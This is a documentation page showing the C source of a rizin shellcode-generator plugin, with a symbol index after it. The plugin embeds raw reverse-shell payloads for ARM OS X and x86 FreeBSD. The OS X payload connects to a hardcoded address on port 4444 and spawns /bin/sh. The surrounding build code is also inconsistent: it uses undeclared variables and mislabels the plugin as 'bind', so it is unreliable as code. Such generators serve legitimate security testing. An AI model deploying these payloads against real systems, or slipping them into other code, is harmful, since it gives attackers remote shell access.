rz-bindgen/doxygen/egg__reverse_8c_source.html

 // SPDX-FileCopyrightText: 2013 pancake <pancake@nopcode.org>

 // SPDX-License-Identifier: LGPL-3.0-only


 #include <rz_egg.h>


 unsigned long armle_osx_reverse[] = {

     0xe3a00002, 0xe3a01001, 0xe3a02006, 0xe3a0c061, 0xef000080, 0xe1a0a000, 0xeb000001,

     0x5c110200, //# port 4444

     0x8700a8c0, //# host 192.168.0.135

     0xe1a0000a, 0xe1a0100e, 0xe3a02010, 0xe3a0c062, 0xef000080,

     0xe3a05002, 0xe3a0c05a, 0xe1a0000a, 0xe1a01005, 0xef000080,

     0xe2455001, 0xe3550000, 0xaafffff8, 0xe3a00000, 0xe3a01001,

     0xe3a0c07e, 0xef000080, 0xe0455005, 0xe1a0600d, 0xe24dd020,

     0xe28f0014, 0xe4860000, 0xe5865004, 0xe1a01006, 0xe3a02000,

     0xe3a0c03b, 0xef000080,

     //# /bin/sh

     0x6e69622f, 0x0068732f

 };


 unsigned char x86_freebsd_reverse[] =

     "\xeb\x68\x5e\x31\xc0\x31\xdb\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x53\xb0\x61"

     "\xcd\x80\x89\xc2\xc6\x46\x01\x02\x66\xc7\x46\x02\x69\x7a\xb3\x10\x53\x8d\x1e"

     "\x53\x50\x50\xb0\x62\xcd\x80\x31\xdb\x53\x52\xb0\x5a\x50\xcd\x80\xfe\xc3\x53"

     "\x52\xb0\x5a\x50\xcd\x80\xfe\xc3\x53\x52\xb0\x5a\x50\xcd\x80\x31\xdb\x53\x8d"

     "\x7e\x0f\x31\xc0\x31\xc9\xb1\x09\xf3\xaa\x8d\x5e\x08\x89\x5e\x10\x8d\x4e\x10"

     "\x51\x53\x50\xb0\x3b\xcd\x80\xb0\x01\xcd\x80\xe8\x93\xff\xff\xff\x41\x42\x43"

     "\x43\x7f\x00\x00\x01\x2f\x62\x69\x6e\x2f\x73\x68";


 static RzBuffer *build(RzEgg *egg) {

     RzBuffer *buf = rz_buf_new_with_bytes(NULL, 0);

     const ut8 *sc = NULL;

     int cd = 0;

     char *port = rz_egg_option_get(egg, "port");

     // TODO: char *udp = rz_egg_option_get (egg, "udp");

     switch (egg->os) {

     case RZ_EGG_OS_OSX:

     case RZ_EGG_OS_DARWIN:

         switch (egg->arch) {

         case RZ_SYS_ARCH_ARM:

             sc = armle_osx_reverse;

             cd = 7 + 36;

             break;

         }

         break;

     case RZ_EGG_OS_FREEBSD:

         switch (egg->arch) {

         case RZ_SYS_ARCH_X86:

             switch (egg->bits) {

             case 32: sc = x86_freebsd_reverse; break;

             default: eprintf("Unsupportted\n");

             }

             break;

         }

         break;

     default:

         eprintf("unsupported os %x\n", egg->os);

         break;

     }

     if (sc) {

         rz_buf_set_bytes(buf, sc, strlen((const char *)sc));

         if (shell && *shell) {

             if (cd)

                 rz_buf_write_at(buf, cd, (const ut8 *)shell, strlen(shell) + 1);

             else

                 eprintf("Cannot set shell\n");

         }

     }

     free(suid);

     free(shell);

     return buf;

 }


 // TODO: rename plugin to run

 RzEggPlugin rz_egg_plugin_bind = {

     .name = "bind",

     .type = RZ_EGG_PLUGIN_SHELLCODE,

     .desc = "listen port=4444",

     .build = (void *)build

 };


 #ifndef RZ_PLUGIN_INCORE

 RZ_API RzLibStruct rizin_plugin = {

     .type = RZ_LIB_TYPE_EGG,

     .data = &rz_egg_plugin_bind,

     .version = RZ_VERSION

 };

 #endif

cd
static csh cd
Definition: asm_mips_cs.c:10

RZ_API
#define RZ_API
Definition: core_plugin_example.c:36

NULL
#define NULL
Definition: cris-opc.c:27

rz_egg_option_get
RZ_API char * rz_egg_option_get(RzEgg *egg, const char *key)
Definition: egg.c:534

sc
static char sc[]
Definition: egg_cb.c:6

armle_osx_reverse
unsigned long armle_osx_reverse[]
Definition: egg_reverse.c:6

build
static RzBuffer * build(RzEgg *egg)
Definition: egg_reverse.c:29

rizin_plugin
RZ_API RzLibStruct rizin_plugin
Definition: egg_reverse.c:82

rz_egg_plugin_bind
RzEggPlugin rz_egg_plugin_bind
Definition: egg_reverse.c:74

x86_freebsd_reverse
unsigned char x86_freebsd_reverse[]
Definition: egg_reverse.c:20

free
RZ_API void Ht_() free(HtName_(Ht) *ht)
Definition: ht_inc.c:130

buf
voidpf void * buf
Definition: ioapi.h:138

ut8
uint8_t ut8
Definition: lh5801.h:11

eprintf
#define eprintf(x, y...)
Definition: rlcc.c:7

rz_buf_write_at
RZ_API st64 rz_buf_write_at(RZ_NONNULL RzBuffer *b, ut64 addr, RZ_NONNULL const ut8 *buf, ut64 len)
Write len bytes of the buffer at the specified address.
Definition: buf.c:1197

rz_buf_set_bytes
RZ_API bool rz_buf_set_bytes(RZ_NONNULL RzBuffer *b, RZ_NONNULL const ut8 *buf, ut64 len)
Replace the content of the buffer with the bytes array.
Definition: buf.c:905

rz_buf_new_with_bytes
RZ_API RZ_OWN RzBuffer * rz_buf_new_with_bytes(RZ_NULLABLE RZ_BORROW const ut8 *bytes, ut64 len)
Creates a new buffer with a bytes array.
Definition: buf.c:465

rz_egg.h

RZ_EGG_PLUGIN_SHELLCODE
#define RZ_EGG_PLUGIN_SHELLCODE
Definition: rz_egg.h:19

RZ_EGG_OS_DARWIN
#define RZ_EGG_OS_DARWIN
Definition: rz_egg.h:129

RZ_EGG_OS_OSX
#define RZ_EGG_OS_OSX
Definition: rz_egg.h:128

RZ_EGG_OS_FREEBSD
#define RZ_EGG_OS_FREEBSD
Definition: rz_egg.h:136

RZ_LIB_TYPE_EGG
@ RZ_LIB_TYPE_EGG
Definition: rz_lib.h:84

RZ_SYS_ARCH_X86
@ RZ_SYS_ARCH_X86
Definition: rz_types.h:532

RZ_SYS_ARCH_ARM
@ RZ_SYS_ARCH_ARM
Definition: rz_types.h:533

RZ_VERSION
#define RZ_VERSION
Definition: rz_version.h:8

rz_buf_t
Definition: rz_buf.h:43

rz_egg_plugin_t
Definition: rz_egg.h:22

rz_egg_plugin_t::name
const char * name
Definition: rz_egg.h:23

rz_egg_t
Definition: rz_egg.h:93

rz_egg_t::bits
int bits
Definition: rz_egg.h:108

rz_egg_t::arch
int arch
Definition: rz_egg.h:106

rz_egg_t::os
ut32 os
Definition: rz_egg.h:109

rz_lib_struct_t
Definition: rz_lib.h:57

rz_lib_struct_t::type
int type
Definition: rz_lib.h:58